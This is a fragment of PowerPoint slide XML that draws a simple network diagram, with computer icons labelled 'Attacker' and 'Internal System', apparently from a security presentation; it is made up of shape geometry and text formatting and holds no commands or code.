            <a:off x="5669913" y="1626360"/>
            <a:ext cx="3397887" cy="2769870"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3398419" cy="2769870"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 4"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1982420" y="0"/>
              <a:ext cx="1415999" cy="575310"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="1415999" cy="575310"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="computr2"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="521335" cy="575310"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                  <a:gd name="T1" fmla="*/ 0 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10800 w 21600"/>
                  <a:gd name="T3" fmla="*/ 21600 h 21600"/>
                  <a:gd name="T4" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  <a:gd name="T6" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T7" fmla="*/ 0 h 21600"/>
                  <a:gd name="T8" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T9" fmla="*/ 11631 h 21600"/>
                  <a:gd name="T10" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T11" fmla="*/ 11631 h 21600"/>
                  <a:gd name="T12" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T13" fmla="*/ 5816 h 21600"/>
                  <a:gd name="T14" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T15" fmla="*/ 5816 h 21600"/>
                  <a:gd name="T16" fmla="*/ 18828 w 21600"/>
                  <a:gd name="T17" fmla="*/ 15785 h 21600"/>
                  <a:gd name="T18" fmla="*/ 2772 w 21600"/>
                  <a:gd name="T19" fmla="*/ 15785 h 21600"/>
                  <a:gd name="T20" fmla="*/ 6194 w 21600"/>
                  <a:gd name="T21" fmla="*/ 1913 h 21600"/>
                  <a:gd name="T22" fmla="*/ 15565 w 21600"/>
                  <a:gd name="T23" fmla="*/ 974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 extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="21022" y="20295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18828" y="18396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18828" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="11156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10858" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="11037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="18514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="20295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="20413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="20651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="21363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10858" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20907" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21138" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21253" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21369" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21484" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21484" y="20888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21369" y="20651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21253" y="20413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21022" y="20295"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="18019" y="18514"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17326" y="17921"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4389" y="17921"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3696" y="18514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18019" y="18514"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="19174" y="19701"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18481" y="19108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3119" y="19108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2426" y="19701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19174" y="19701"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="20560" y="20769"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19867" y="20176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1848" y="20176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="20769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20560" y="20769"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="18828" y="18396"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17442" y="17209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4158" y="17209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="18514"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="13168" y="14123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13168" y="14716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17788" y="14716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17788" y="14123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13168" y="14123"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="6122" y="1899"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6122" y="9732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="9732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="1899"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="1899"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="6122" y="11631"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15478" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="11631"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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>
                    <a:effectLst/>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Times New Roman"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100">
                  <a:effectLst/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Text Box 2"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="519379" y="0"/>
                <a:ext cx="896620" cy="28511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400" b="1">
                    <a:effectLst/>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="SimSun"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t>Attacker</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100">
                  <a:effectLst/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:endParaRPr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>
              <a:off x="1667866" y="2194560"/>
              <a:ext cx="1459890" cy="575310"/>
              <a:chOff x="0" y="21945"/>
              <a:chExt cx="1459890" cy="575310"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="14" name="computr2"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="21945"/>
                <a:ext cx="521335" cy="575310"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                  <a:gd name="T1" fmla="*/ 0 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10800 w 21600"/>
                  <a:gd name="T3" fmla="*/ 21600 h 21600"/>
                  <a:gd name="T4" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  <a:gd name="T6" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T7" fmla="*/ 0 h 21600"/>
                  <a:gd name="T8" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T9" fmla="*/ 11631 h 21600"/>
                  <a:gd name="T10" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T11" fmla="*/ 11631 h 21600"/>
                  <a:gd name="T12" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T13" fmla="*/ 5816 h 21600"/>
                  <a:gd name="T14" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T15" fmla="*/ 5816 h 21600"/>
                  <a:gd name="T16" fmla="*/ 18828 w 21600"/>
                  <a:gd name="T17" fmla="*/ 15785 h 21600"/>
                  <a:gd name="T18" fmla="*/ 2772 w 21600"/>
                  <a:gd name="T19" fmla="*/ 15785 h 21600"/>
                  <a:gd name="T20" fmla="*/ 6194 w 21600"/>
                  <a:gd name="T21" fmla="*/ 1913 h 21600"/>
                  <a:gd name="T22" fmla="*/ 15565 w 21600"/>
                  <a:gd name="T23" fmla="*/ 974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 extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="21022" y="20295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18828" y="18396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18828" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="11156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10858" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="11037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="18514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="20295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="20413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="20651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="21363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10858" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20907" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21138" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21253" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21369" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21484" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21484" y="20888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21369" y="20651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21253" y="20413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21022" y="20295"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="18019" y="18514"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17326" y="17921"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4389" y="17921"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3696" y="18514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18019" y="18514"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="19174" y="19701"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18481" y="19108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3119" y="19108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2426" y="19701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19174" y="19701"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="20560" y="20769"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19867" y="20176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1848" y="20176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="20769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20560" y="20769"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="18828" y="18396"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17442" y="17209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4158" y="17209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="18514"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="13168" y="14123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13168" y="14716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17788" y="14716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17788" y="14123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13168" y="14123"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="6122" y="1899"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6122" y="9732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="9732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="1899"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="1899"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="6122" y="11631"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15478" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="11631"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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>
                    <a:effectLst/>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Times New Roman"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100">
                  <a:effectLst/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="Text Box 2"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563270" y="43891"/>
                <a:ext cx="896620" cy="46799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200" b="1">
                    <a:effectLst/>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="SimSun"/>
                    <a:cs typeface="Times New Roman"/>
                  </a:rPr>
                  <a:t>Internal System</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1100">
                  <a:effectLst/>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="SimSun"/>
                  <a:cs typeface="Times New Roman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0" y="1287475"/>
              <a:ext cx="2391893" cy="575310"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="2391893" cy="575310"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="computr2"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="899770" y="0"/>
                <a:ext cx="521335" cy="575310"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10800 w 21600"/>
                  <a:gd name="T1" fmla="*/ 0 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10800 w 21600"/>
                  <a:gd name="T3" fmla="*/ 21600 h 21600"/>
                  <a:gd name="T4" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T5" fmla="*/ 0 h 21600"/>
                  <a:gd name="T6" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T7" fmla="*/ 0 h 21600"/>
                  <a:gd name="T8" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T9" fmla="*/ 11631 h 21600"/>
                  <a:gd name="T10" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T11" fmla="*/ 11631 h 21600"/>
                  <a:gd name="T12" fmla="*/ 4274 w 21600"/>
                  <a:gd name="T13" fmla="*/ 5816 h 21600"/>
                  <a:gd name="T14" fmla="*/ 17326 w 21600"/>
                  <a:gd name="T15" fmla="*/ 5816 h 21600"/>
                  <a:gd name="T16" fmla="*/ 18828 w 21600"/>
                  <a:gd name="T17" fmla="*/ 15785 h 21600"/>
                  <a:gd name="T18" fmla="*/ 2772 w 21600"/>
                  <a:gd name="T19" fmla="*/ 15785 h 21600"/>
                  <a:gd name="T20" fmla="*/ 6194 w 21600"/>
                  <a:gd name="T21" fmla="*/ 1913 h 21600"/>
                  <a:gd name="T22" fmla="*/ 15565 w 21600"/>
                  <a:gd name="T23" fmla="*/ 974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 extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="21022" y="20295"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18828" y="18396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18828" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="11156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17326" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10858" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="11037"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4274" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="18514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="20295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="20413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="20651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="21363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10858" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20907" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21138" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21253" y="21600"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21369" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21484" y="21481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21600" y="21125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21484" y="20888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21369" y="20651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21253" y="20413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21022" y="20295"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="18019" y="18514"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17326" y="17921"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4389" y="17921"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3696" y="18514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18019" y="18514"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="19174" y="19701"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="18481" y="19108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3119" y="19108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2426" y="19701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19174" y="19701"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="20560" y="20769"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="19867" y="20176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1848" y="20176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="20769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20560" y="20769"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="18828" y="18396"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17442" y="17209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4158" y="17209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2772" y="18514"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="13168" y="14123"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="13168" y="14716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17788" y="14716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17788" y="14123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13168" y="14123"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="21600" h="21600" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="6122" y="1899"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6122" y="9732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="9732"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="1899"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="1899"/>
                    </a:lnTo>
                    <a:moveTo>
                      <a:pt x="6122" y="11631"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="15478" y="11631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15478" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="13174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6122" y="11631"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFFF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>
                    <a:effectLst/>
                    <a:latin typeface="Calibri"/>
                    <a:ea typeface="Times New Roman"/>
